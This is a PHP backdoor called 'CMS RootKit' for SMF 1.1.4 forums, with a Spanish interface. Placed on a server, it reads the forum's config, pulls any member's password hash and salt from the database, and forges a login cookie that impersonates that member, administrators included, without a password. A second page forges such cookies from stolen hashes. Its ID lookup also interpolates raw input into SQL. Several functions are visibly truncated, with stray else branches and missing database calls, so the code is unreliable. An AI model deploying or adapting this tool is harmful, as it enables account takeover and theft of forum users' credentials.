<?php
#################################################
# Archivo : rk.php #
# Nombre : CMS RootKit #
# Version : 2.3 Beta #
# Autor : WHK #
# Sistemas CMS soportados : SMF 1.1.4 #
#################################################
// Declaraciones, variables y constantes ============================================
// Request intake: every control value below is read straight from $_GET.
// rk_filtro() is defined further down (PHP registers unconditional top-level
// functions before execution) and, as written, contains no return statement,
// so each rk_filtro() assignment here evaluates to null. Only "cookiename"
// skips that filter and is urlencoded instead. No value is checked for type
// or numeric range before it is interpolated into HTML and SQL later on.
$rk_path_smf = "./Settings.php";
$rk_path_wordpress = "./wp-config.php";
$rk_cms = rk_filtro($_GET["CMS"]);
$rk_id = rk_filtro($_GET["id"]);
// $rk_tipo_user = rk_filtro($_GET["tipo_user"]);
$rk_username = rk_filtro($_GET["username"]);
$rk_cookiename = urlencode($_GET["cookiename"]); $rk_id_MEMBER = rk_filtro($_GET["ID_MEMBER"]);
$rk_id_GROUP = rk_filtro($_GET["ID_GROUP"]);
$rk_passwd = rk_filtro($_GET["passwd"]);
$rk_passwordSalt = rk_filtro($_GET["passwordSalt"]);
$rk_header = "<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">
<html>
<head>
<title>CMS RootKit by WHK</title>
</head>
<body style=\"color: rgb(255, 255, 255); background-color: rgb(102, 0, 0);\" alink=\"white\" link=\"white\" vlink=\"white\">\n<div style=\"text-align: center;\">
<big>
<span style=\"font-weight: bold;\"><a href=\"?\">CMS RootKit by WHK</a></span>
</big><br />
</div><br /><br />
<table style=\"text-align: center; width: 100%; font-weight: bold;\" border=\"0\">
<tbody>
<tr>
<td>Herramientas</td>
</tr>
</tbody>
</table>
<table style=\"text-align: center; width: 100%;\" border=\"1\" cellpadding=\"0\" cellspacing=\"0\">
<tbody>
<tr>
<td><a href=\"?CMS=crear\">Crear cookie</a></td>
</tr>
</tbody>
</table>
<br /><br />";
$rk_footer = "</body>
</html>";
$rk_consola_a = "<span style=\"font-style: italic; font-weight: bold;\">Debugger</span><br />
<table style=\"text-align: left; width: 100%; color: rgb(51, 255, 51);\" border=\"2\" cellpadding=\"0\" cellspacing=\"0\">
<tbody>
<tr>
<td style=\"background-color: rgb(0, 0, 0);\">\n";
$rk_consola_b = "</td>
</tr>
</tbody>
</table>\n";
$rk_contenido_1 = "<br /><br />
<span style=\"font-weight: bold;\"> Haz click sobre el sistema CMS que deseas administrar.</span>\n";
$rk_contenido_2 = "<span style=\"font-weight: bold;\">Ingrese el nombre de usuario registrado para iniciar seción, o si
lo prefieres puedes ingresar únicamente el numero de usuario registrado.
(No se requiere password).<br /><br />
</span>
<form method=\"get\">
<input name=\"CMS\" value=\"SMF\" type=\"hidden\">
<table border=\"0\" cellpadding=\"1\" cellspacing=\"0\">
<tbody>
<tr>
<td>Username: </td>
<td><input name=\"username\" type=\"text\"></td>
<td><input value=\"Ingresar\" type=\"submit\"></td>
</tr>
</form>
<form method=\"get\">
<input name=\"CMS\" value=\"SMF\" type=\"hidden\">
<tr>
<td>Id Nº: </td>
<td><input name=\"id\" type=\"text\"></td>
<td><input value=\"Ingresar\" type=\"submit\"></td>
</tr>
</tbody>
</table>
</form>\n";
$rk_error_1 = "Falta cookiename";
$rk_error_2 = "Falta ID_MEMBER";
$rk_error_3 = "Falta passwd";
$rk_error_4 = "Falta passwordSalt";
$rk_error_5 = "Falta ID_GROUP";
$rk_comando_0 = "root@system:~$ <br />\n";
$rk_comando_1 = "root@system:~$ rk -cms verificar<br />\n";
$rk_comando_2 = "root@system:~$ rk -cms $rk_cms<br />\n";
$rk_comando_3 = "root@system:~$ rk -cms $rk_cms -username $rk_username<br />\n";
$rk_comando_4 = "root@system:~$ rk -cms $rk_cms -cookiename $rk_cookiename -ID_MEMBER $rk_id_MEMBER -passwd *** -passwordSalt $rk_passwordSalt<br />\n";
// ==================================================================================
// Funciones ========================================================================
// Filtro ---------------------------------------------------------------------------
/**
 * Blacklist filter applied to the $_GET values this script reads.
 *
 * Runs eregi() with each entry of a fixed list (back-tick, acute accent,
 * quotes, angle brackets, semicolon, and their percent-encoded forms) as the
 * pattern against $rk_input. On a match it echoes an HTML notice naming the
 * entry and keeps going: execution is not stopped and nothing is returned,
 * so a caller that assigns the result receives null whether or not the input
 * was rejected. Deny-listing characters is not a substitute for
 * context-specific escaping of the value where it is later used.
 *
 * NOTE(review): eregi() was removed in PHP 7.0, so this call is a fatal
 * error on any current runtime.
 * NOTE(review): $rk_referer is never assigned in this function's scope, so
 * the link href it interpolates is empty.
 *
 * @param mixed $rk_input raw request value
 * @return void
 */
function rk_filtro($rk_input){
$rk_filtro = array("`", "´", '"', "<", ">", ";", "'", "%60", "%C2%B4", "%22", "%3E", "%3C","%27", "%25", "%"); for ($rk_i=0; $rk_i < count($rk_filtro) ; $rk_i++) { if(eregi($rk_filtro[$rk_i],$rk_input)) { echo "<center>Por razones de seguridad no puede mostrarse la página debido a que has ingresado<br />
uno o mas caracteres prohibidos (".htmlspecialchars($rk_filtro[$rk_i]).") dentro de algún campo.<br /><br /> <a href=\"$rk_referer\">Buelva a intentarlo por favor</a>.</center>\n";
}
}
}
// ----------------------------------------------------------------------------------
// Verificación de sistemas CMS -----------------------------------------------------
function rk_verificar($rk_vcms, $rk_path){
rk_consola("Se ha detectado un sistema <a style=\"color: rgb(51, 255, 51);\" href=\"?CMS=$rk_vcms\">$rk_vcms</a> en este directorio.");
return false;
} else {
return true;
}
}
// ----------------------------------------------------------------------------------
// Mensaje de error -----------------------------------------------------------------
/**
 * Print one red "[!]" error line into the page.
 *
 * The message is inserted into the markup without escaping; callers rely on
 * that and pass fragments such as "<br />" themselves.
 *
 * @param string $rk_ferror message text or markup
 * @return bool always true
 */
function rk_error($rk_ferror){
$rk_line = sprintf("<font style='color: red'>[!] %s</font><br />\n", $rk_ferror);
print $rk_line;
return true;
}
// ----------------------------------------------------------------------------------
// Mensaje rojo ---------------------------------------------------------------------
/**
 * Print $rk_fcolor inside a bold dark-red span (no escaping is applied).
 *
 * @param string $rk_fcolor text or markup to display
 * @return void
 */
function rk_msg_rojo($rk_fcolor){
$rk_open = '<span style="font-weight: bold; color: rgb(204, 0, 0);">';
print $rk_open . $rk_fcolor . '</span>';
}
// ----------------------------------------------------------------------------------
// Mensaje verde --------------------------------------------------------------------
/**
 * Print $rk_fcolor inside a bold green span (no escaping is applied).
 *
 * @param string $rk_fcolor text or markup to display
 * @return void
 */
function rk_msg_verde($rk_fcolor){
$rk_open = '<span style="font-weight: bold; color: rgb(0, 153, 0);">';
print $rk_open . $rk_fcolor . '</span>';
}
// ----------------------------------------------------------------------------------
// Mensaje multicolor ---------------------------------------------------------------
/**
 * Print $rk_fcolor in red when $verificar loosely equals "1", otherwise in
 * green. The loose comparison is deliberate: callers pass either the string
 * "1" or an unset flag.
 *
 * @param string $rk_fcolor text or markup to display
 * @param mixed  $verificar "1" selects the red variant
 * @return void
 */
function rk_msg_multicolor($rk_fcolor, $verificar){
$rk_flagged = ($verificar == "1");
$rk_flagged ? rk_msg_rojo($rk_fcolor) : rk_msg_verde($rk_fcolor);
}
// ----------------------------------------------------------------------------------
// Mensaje de consola ---------------------------------------------------------------
/**
 * Print one "[*]" console-style line into the page.
 *
 * The argument is emitted verbatim (callers pass anchors and other markup),
 * followed by a line break.
 *
 * @param string $rk_fconsola text or markup to display
 * @return void
 */
function rk_consola($rk_fconsola){
$rk_line = '[*] ' . $rk_fconsola . '<br />' . "\n";
print $rk_line;
}
// ----------------------------------------------------------------------------------
// ==================================================================================
// Inicio ===========================================================================
if($rk_cms == ""){
echo $rk_header;
echo $rk_consola_a;
echo $rk_comando_1;
rk_consola("Verificando sistemas CMS ...");
// Verificando sistemas CMS... -----------------------------------------------------
if (!rk_verificar("SMF", $rk_path_smf)) {
$rk_b = "1";
}
if (!rk_verificar("Wordpress", $rk_path_wordpress)) {
$rk_b = "1";
}
// ----------------------------------------------------------------------------------
if ($rk_b != "1") {
rk_error("No se ha detectado ningún sistema CMS.<br />\n");
echo "<br />$rk_comando_0\n";
echo $rk_consola_b;
echo $rk_footer;
} else {
echo "<br />$rk_comando_0\n";
echo $rk_consola_b;
echo $rk_contenido_1;
echo $rk_footer;
}
}
// ==================================================================================
// Crear cookie =====================================================================
$rk_e = "1";
if($rk_cms == "crear") {
if ($rk_cookiename == "") { $rk_f1 = "1" ; $rk_e++ ; }
if ($rk_id_MEMBER == "") { $rk_f2 = "1" ; $rk_e++ ; }
if ($rk_passwd == "") { $rk_f3 = "1" ; $rk_e++ ; }
if ($rk_passwordSalt == "") { $rk_f4 = "1" ; $rk_e++ ; }
if ($rk_id_GROUP == "") { $rk_f5 = "1" ; $rk_e++ ; }
if ($rk_e == "6") {
echo $rk_header;
echo "<span style=\"font-weight: bold; text-decoration: underline;\">SMF</span>
<form method=\"get\">
<table style=\"text-align: left; width: 100%;\" border=\"1\"
cellpadding=\"1\" cellspacing=\"0\">
<tbody>
<tr>
<td>
<input name=\"CMS\" value=\"crear\" type=\"hidden\">
<table border=\"0\" cellpadding=\"1\" cellspacing=\"0\">
<tbody>
<tr>
<td>cookiename: </td>
<td><input name=\"cookiename\" type=\"text\"></td>
</tr>
<tr>
<td>ID_MEMBER: </td>
<td><input name=\"ID_MEMBER\" type=\"text\"></td>
</tr>
<tr>
<td>Passwd (HASH): </td>
<td><input name=\"passwd\" type=\"text\"></td>
</tr>
<tr>
<td>passwordSalt: </td>
<td><input name=\"passwordSalt\" type=\"text\"></td>
</tr>
<tr>
<td>ID_GROUP: </td>
<td><input name=\"ID_GROUP\" type=\"text\"></td>
<td><input value=\"Generar cookie\" type=\"submit\"></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</form>
<br />
Ingresa los siguientes datos para generar tu cookie.";
echo $rk_footer;
} else {
if ($rk_e >= "2") {
echo "$rk_header $rk_consola_a $rk_comando_4";
if ($rk_f1 == "1") { rk_error("$rk_error_1"); }
if ($rk_f2 == "1") { rk_error("$rk_error_2"); }
if ($rk_f3 == "1") { rk_error("$rk_error_3"); }
if ($rk_f4 == "1") { rk_error("$rk_error_4"); }
if ($rk_f5 == "1") { rk_error("$rk_error_5"); }
echo "<br />$rk_comando_0\n$rk_consola_b ";
echo "<br /><span style=\"font-weight: bold; text-decoration: underline;\">SMF</span>
<form method=\"get\">
<table style=\"text-align: left; width: 100%;\" border=\"1\"
cellpadding=\"1\" cellspacing=\"0\">
<tbody>
<tr>
<td>
<input name=\"CMS\" value=\"crear\" type=\"hidden\">
<table border=\"0\" cellpadding=\"1\" cellspacing=\"0\">
<tbody>
<tr>
<td>";rk_msg_multicolor("cookiename:", $rk_f1);echo" </td>
<td><input name=\"cookiename\" type=\"text\" value=\"$rk_cookiename\"></td>
</tr>
<tr>
<td>";rk_msg_multicolor("ID_MEMBER:", $rk_f2);echo" </td>
<td><input name=\"ID_MEMBER\" type=\"text\" value=\"$rk_id_MEMBER\"></td>
</tr>
<tr>
<td>";rk_msg_multicolor("Passwd (HASH):", $rk_f3);echo" </td>
<td><input name=\"passwd\" type=\"text\" value=\"$rk_passwd\"></td>
</tr>
<tr>
<td>";rk_msg_multicolor("passwordSalt:", $rk_f4);echo" </td>
<td><input name=\"passwordSalt\" type=\"text\" value=\"$rk_passwordSalt\"></td>
</tr>
<tr>
<td>";rk_msg_multicolor("ID_GROUP:", $rk_f5);echo" </td>
<td><input name=\"ID_GROUP\" type=\"text\" value=\"$rk_id_GROUP\"></td>
<td><input value=\"Generar cookie\" type=\"submit\"></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</form>
<br />
Ingresa los siguientes datos para generar tu cookie.";
echo $rk_footer;
}
if ($rk_e == "1") {
echo $rk_header;
echo $rk_consola_a;
echo $rk_comando_4;
if($rk_id_GROUP == "1") {
// Administrador
rk_consola("Construyendo cookie...");
rk_consola("Datos:");
echo "<font style='color: red'>\n[!] cookiename: $rk_cookiename<br />\n";
echo "[!] ID_MEMBER: $rk_id_MEMBER<br />\n";
echo "[!] passwd (hash): $rk_passwd<br />\n";
echo "[!] passwordSalt: $rk_passwordSalt</font><br />\n";
rk_consola
("Cookie : $rk_cookiename=".urlencode("a:4:{i:0;s:1:\"$rk_id_MEMBER\";i:1;s:40:\"".sha1($rk_passwd.$rk_passwordSalt)."\";i:2;i:1196740416;i:3;i:0;}")); echo "<br />$rk_comando_0\n";
echo $rk_consola_b;
echo $rk_footer;
}
if($rk_id_GROUP == "0") {
// Usuario
rk_consola("Construyendo cookie...");
rk_consola("Datos:");
echo "<font style='color: red'>\n[!] cookiename: $rk_cookiename<br />\n";
echo "[!] ID_MEMBER: $rk_id_MEMBER<br />\n";
echo "[!] passwd (hash): $rk_passwd<br />\n";
echo "[!] passwordSalt: $rk_passwordSalt</font><br />\n";
rk_consola
("Cookie : $rk_cookiename=".urlencode("a:4:{i:0;i:$rk_id_MEMBER;i:1;s:40:\"".sha1($rk_passwd.$rk_passwordSalt)."\";i:2;i:1196740416;i:3;i:0;}")); echo "<br />$rk_comando_0\n";
echo $rk_consola_b;
echo $rk_footer;
}
}
}
}
// ==================================================================================
// SMF ==============================================================================
if($rk_cms == "SMF") {
echo $rk_header;
echo $rk_consola_a;
if($rk_username != ""){
echo $rk_comando_3;
} else {
echo $rk_comando_2;
}
// Verificando la existencia de SMF -------------------------------------------------
rk_consola("Verificando sistema SMF...");
include($rk_path_smf);
rk_consola("Verifición satisfactoria.");
} else {
rk_error("No existe el sistema CMS en este directorio.");
echo "<br />$rk_comando_0\n";
echo $rk_consola_b;
echo $rk_footer;
}
// Definiendo conexión SQL ---------------------------------------------------------
// ----------------------------------------------------------------------------------------
// Función de la consulta SQL -------------------------------------------------------
function rk_db_query($rk_sql){
rk_error("Error en la conección.");
return false;
}
rk_error("Error al seleccionar la base de datos.");
return false;
}
rk_error("Error al efectuar la busqueda.");
return false;
}
return $rk_query;
}
// Verificando ID_MEMBER y memberName ------------------------------------------------
$rk_consulta2 = "SELECT ID_MEMBER FROM `".$db_prefix."members`";
if ($rk_id != "") {
$rk_consulta = "SELECT * FROM `".$db_prefix."members` WHERE ID_MEMBER = $rk_id";
$c_ = "1";
}
if ($c_ != "1") {
if ($rk_username != "") {
$rk_consulta = "SELECT * FROM `".$db_prefix."members` WHERE `memberName` LIKE CONVERT(_utf8 '$rk_username' USING latin1) COLLATE latin1_swedish_ci";
}
}
// Buscando usuario ------------------------------------------------------------------
rk_consola("Conectando...");
if(($rk_username == "") and ($rk_id == "")){
if ($rk_query = rk_db_query($rk_consulta2)){
$rk_whk = "1";
foreach ($rk_row as $rk_out)
$rk_whk++;
}
$rk_whk_out = $rk_whk - 1;
rk_consola("Conección satisfactoria.");
}
rk_consola("Numero de usuarios registrados: $rk_whk_out");
echo "<br />$rk_comando_0\n";
echo $rk_consola_b;
echo $rk_contenido_2;
echo $rk_footer;
} else {
if ($rk_query = rk_db_query($rk_consulta)){
rk_consola("Conección satisfactoria.");
if ($c_ == "1") {
rk_consola("Buscando usuario Nº$rk_id ...");
} else {
rk_consola("Buscando usuario $rk_username...");
}
$rk_whk = 1;
foreach ($rk_row as $rk_out){
if ($rk_whk == "1" ){ $rk_idMEMBER_out = $rk_out; }
if ($rk_whk == "2" ){ $rk_usernameout = $rk_out; }
if ($rk_whk == "5" ){ $rk_idGROUP_out = $rk_out; }
if ($rk_whk == "14"){ $rk_passwd_out = $rk_out; }
if ($rk_whk == "52"){ $rk_passwordSalt_out = $rk_out; }
$rk_whk++;
}
}
}
}
// Aplicando cookie ------------------------------------------------------------------
if($rk_idGROUP_out == "1") {
// Administrador
rk_consola("Usuario encontrado. Construyendo cookie...");
rk_consola("Datos:");
echo "<font style='color: red'>\n[!] cookiename: $cookiename<br />\n";
echo "[!] Username: $rk_usernameout<br />\n";
echo "[!] ID_MEMBER: $rk_idMEMBER_out<br />\n";
echo "[!] passwd (hash): $rk_passwd_out<br />\n";
echo "[!] passwordSalt: $rk_passwordSalt_out<br />\n";
echo "[!] ID_GROUP: $rk_idGROUP_out (Administrador)</font><br />\n";
echo "<script>void(document.cookie='$cookiename=".urlencode("a:4:{i:0;s:1:\"$rk_idMEMBER_out\";i:1;s:40:\"".sha1($rk_passwd_out.$rk_passwordSalt_out)."\";i:2;i:1196740416;i:3;i:0;}")."');</script>\n"; rk_consola("Cookie aplicada.");
}
if($rk_idGROUP_out == "0") {
// Usuario
rk_consola("Usuario encontrado. Construyendo cookie...");
rk_consola("Datos:");
echo "<font style='color: red'>\n[!] cookiename: $cookiename<br />\n";
echo "[!] Username: $rk_usernameout<br />\n";
echo "[!] ID_MEMBER: $rk_idMEMBER_out<br />\n";
echo "[!] passwd (hash): $rk_passwd_out<br />\n";
echo "[!] passwordSalt: $rk_passwordSalt_out<br />\n";
echo "[!] ID_GROUP: $rk_idGROUP_out (Usuario)</font><br />\n";
echo "<script>void(document.cookie='$cookiename=".urlencode("a:4:{i:0;i:$rk_idMEMBER_out;i:1;s:40:\"".sha1($rk_passwd_out.$rk_passwordSalt_out)."\";i:2;i:1196740416;i:3;i:0;}")."');</script>\n"; rk_consola("Cookie aplicada.");
}
if($rk_idGROUP_out == "") {
// Ninguno
rk_error("Usuario inexistente.<br />\n");
}
echo "<br />$rk_comando_0\n";
echo $rk_consola_b;
echo $rk_contenido_2;
echo $rk_footer;
}
// ----------------------------------------------------------------------------------
// ==================================================================================
// Wordpress ========================================================================
// Wordpress branch: only the page frame and an "En construcción" error line
// are printed; nothing is read from $rk_path_wordpress and no database access
// happens in this block.
if($rk_cms == "Wordpress") {
echo $rk_header;
echo $rk_consola_a;
echo $rk_comando_2;
rk_error("En construcción.");
echo "<br />$rk_comando_0\n";
echo $rk_consola_b;
echo $rk_footer;
}
// ==================================================================================
?>